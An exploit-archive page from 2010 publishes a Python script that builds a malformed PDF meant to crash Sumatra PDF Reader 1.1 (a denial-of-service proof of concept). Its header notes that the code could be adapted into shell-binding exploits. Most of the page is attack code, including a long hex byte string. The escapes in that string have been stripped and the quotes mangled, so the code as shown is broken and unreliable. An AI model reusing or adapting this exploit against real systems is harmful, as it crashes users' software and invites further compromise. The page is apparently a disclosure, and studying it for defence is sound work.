SUMATRA PDF READER version 1.1 (CRASHER) DoS File Creator

Posted on 01 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>SUMATRA PDF READER version 1.1 (CRASHER) DoS File Creator</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================================
SUMATRA PDF READER version 1.1 (CRASHER) DoS File Creator
=========================================================


###########################################################################
###########################################################################
######## SUMATRA PDF READER version 1.1 (CRASHER) DoS File Creator ########
###########################################################################
#         Vulnerability Detection Time : 21st June 2010, 1:13 AM          #
#	    Tested on version 1.1 of Sumara PDF Reader                      #
#         Nature : Accidental Discovery                                   #
###########################################################################
# Description : Sumatra PDF Reader crashed while testing recovered PDF    #
#               Files from a HardDisk. PDF Files recovered using Forensic #
#               Tools were large in size. DoS code has been optimised to  #
#               implement the crash with reduced file-size.               #
# Notes : This source can be modified after analyzing the crash appcompat #
#         files to write shell bind / other payloaded exploits.           #
#         Sumatra PDR Reader crashed when  PDF Files were already         #
#         associated to launch it.
#                                                                         #
# Thanks to Felicity. Hope you got your files back :-)                    #
###########################################################################
# Vulnerability Discoverer : Azim Poonawala [ QUAKERDOOMER ]              #
# Email : quakerdoomer [ @ ] fmguy.com                                    # 
###########################################################################
###########################################################################


#!/usr/bin/python
# Usage: python sumatra_pdf_v1.1_DoS_file.py

data = (
	&quot;x25x50x44x46x2Dx31x2Ex34x0Dx25xE2xE3xCFxD3x0Dx0A&quot; +
	&quot;x36x20x30x20x6Fx62x6Ax3Cx3Cx2Fx48x5Bx36x37x36x20&quot; +
	&quot;x31x35x37x5Dx2Fx4Cx69x6Ex65x61x72x69x7Ax65x64x20&quot; +
	&quot;x31x2Fx45x20x31x34x38x30x32x2Fx4Cx20x31x38x37x31&quot; +
	&quot;x39x2Fx4Ex20x31x2Fx4Fx20x39x2Fx54x20x31x38x35x35&quot; +
	&quot;x33x3Ex3Ex0Dx65x6Ex64x6Fx62x6Ax0Dx20x20x20x20x20&quot; +
	&quot;x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20&quot; +
	&quot;x20x20x0Dx0Ax78x72x65x66x0Dx0Ax36x20x31x39x0Dx0A&quot; +
	&quot;x30x30x30x30x30x30x30x30x31x36x20x30x30x30x30x30&quot; +
	&quot;x20x6Ex0Dx0Ax30x30x30x30x30x30x30x38x33x33x20x30&quot; +
	&quot;x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x36&quot; +
	&quot;x37x36x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30&quot; +
	&quot;x30x30x30x39x30x39x20x30x30x30x30x30x20x6Ex0Dx0A&quot; +
	&quot;x30x30x30x30x30x30x31x30x33x38x20x30x30x30x30x30&quot; +
	&quot;x20x6Ex0Dx0Ax30x30x30x30x30x30x31x32x32x39x20x30&quot; +
	&quot;x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x31x36&quot; +
	&quot;x38x36x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30&quot; +
	&quot;x30x30x32x30x39x30x20x30x30x30x30x30x20x6Ex0Dx0A&quot; +
	&quot;x30x30x30x30x30x30x32x31x32x34x20x30x30x30x30x30&quot; +
	&quot;x20x6Ex0Dx0Ax30x30x30x30x30x30x32x31x36x38x20x30&quot; +
	&quot;x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x33x39&quot; +
	&quot;x34x30x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30&quot; +
	&quot;x30x30x34x33x33x30x20x30x30x30x30x30x20x6Ex0Dx0A&quot; +
	&quot;x30x30x30x30x30x30x36x39x39x39x20x30x30x30x30x30&quot; +
	&quot;x20x6Ex0Dx0Ax30x30x30x30x30x30x37x37x35x39x20x30&quot; +
	&quot;x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x37x39&quot; +
	&quot;x39x38x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30&quot; +
	&quot;x30x30x38x32x34x33x20x30x30x30x30x30x20x6Ex0Dx0A&quot; +
	&quot;x30x30x30x30x30x30x38x34x39x38x20x30x30x30x30x30&quot; +
	&quot;x20x6Ex0Dx0Ax30x30x30x30x30x31x31x34x30x32x20x30&quot; +
	&quot;x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x31x34x37&quot; +
	&quot;x32x36x20x30x30x30x30x30x20x6Ex0Dx0Ax74x72x61x69&quot; +
	&quot;x6Cx65x72x0Dx0Ax3Cx3Cx2Fx53x69x7Ax65x20x32x35x2F&quot; +
	&quot;x50x72x65x76x20x31x38x35x34x33x2Fx52x6Fx6Fx74x20&quot; +
	&quot;x37x20x30x20x52x2Fx49x6Ex66x6Fx20x35x20x30x20x52&quot; +
	&quot;x2Fx49x44x5Bx3Cx33x64x32x38x34x30x64x30x39x37x36&quot; +
	&quot;x61x37x66x32x61x37x30x34x31x37x32x36x65x37x30x38&quot; +
	&quot;x33x38x31x62x30x3Ex3Cx65x39x35x37x38x32x63x37x34&quot; +
	&quot;x36x62x38x34x39x34x64x39x62x39x37x31x33x30x38x37&quot; +
	&quot;x31x38x33x36x62x34x39x3Ex5Dx3Ex3Ex0Dx0Ax73x74x61&quot; +
	&quot;x72x74x78x72x65x66x0Dx0Ax30x0Dx0Ax25x25x45x4Fx46&quot; +
	&quot;x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x20&quot; +
	&quot;x20x20x0Dx0Ax38x20x30x20x6Fx62x6Ax3Cx3Cx2Fx4Cx65&quot; +
	&quot;x6Ex67x74x68x20x38x30x2Fx46x69x6Cx74x65x72x2Fx46&quot; +
	&quot;x6Cx61x74x65x44x65x63x6Fx64x65x2Fx4Cx20x39x30x2F&quot; +
	&quot;x53x20x34x30x3Ex3Ex73x74x72x65x61x6Dx0Dx0Ax78xDA&quot; +
	&quot;x62x60x60x10x60x60x60xFAxC0x20x04x66xAEx0CxA8x80&quot; +
	&quot;x19x88x59x18x38x16x80xD5xC0x81x20x03x8CxAFxC4xC0&quot; +
	&quot;xC3xFAx61xAEx54x61x11x03x03x57xCExC2x94x25x9BxAE&quot; +
	&quot;xF1x5CxB8xCCx7BxDBxECxECx02x2DxB0x3Cx23x03x83xA5&quot; +
	&quot;x29x90x66x02x62x0Bx80x20x03x20x10xE9x0DxCEx0Dx0A&quot; +
	&quot;x65x6Ex64x73x74x72x65x61x6Dx0Dx65x6Ex64x6Fx62x6A&quot; +
	&quot;x0Dx37x20x30x20x6Fx62x6Ax3Cx3Cx2Fx50x61x67x65x73&quot; +
	&quot;x20x33x20x30x20x52x2Fx54x79x70x65x2Fx43x61x74x61&quot; +
	&quot;x6Cx6Fx67x2Fx50x61x67x65x4Cx61x62x65x6Cx73x20x31&quot; +
	&quot;x20x30x20x52x2Fx4Dx65x74x61x64x61x74x61x20x34x20&quot; +
	&quot;x30x20x52x3Ex3Ex0Dx65x6Ex64x6Fx62x6A&quot;
);

try:
    f1 = open(&quot;SumatraPDF_Reader_1.1_crasher_DoS.pdf&quot;,&quot;w&quot;)
    f1.write(data)
    f1.close()
    print(&quot;
PDF file created ! : [SumatraPDF_Reader_1.1_crasher_DoS.pdf]
Launch it to run under Sumatra PDF Reader v1.1 to test crash.

NOTE : Launching Sumatra PDF Reader and then using File/Open Ctrl+O to open
this file WON'T cause a DoS
&quot;)
    print(&quot;Written by : Azim Poonawala (QUAKERDOOMER) [ quakerdoomer [ @ ] fmguy.com ]
		http:/solidmecca.co.nr
		http://winautopwn.co.nr
		http://my.opera.com/quakerdoomer&quot;);
except:
    print &quot;Error&quot;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-01]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20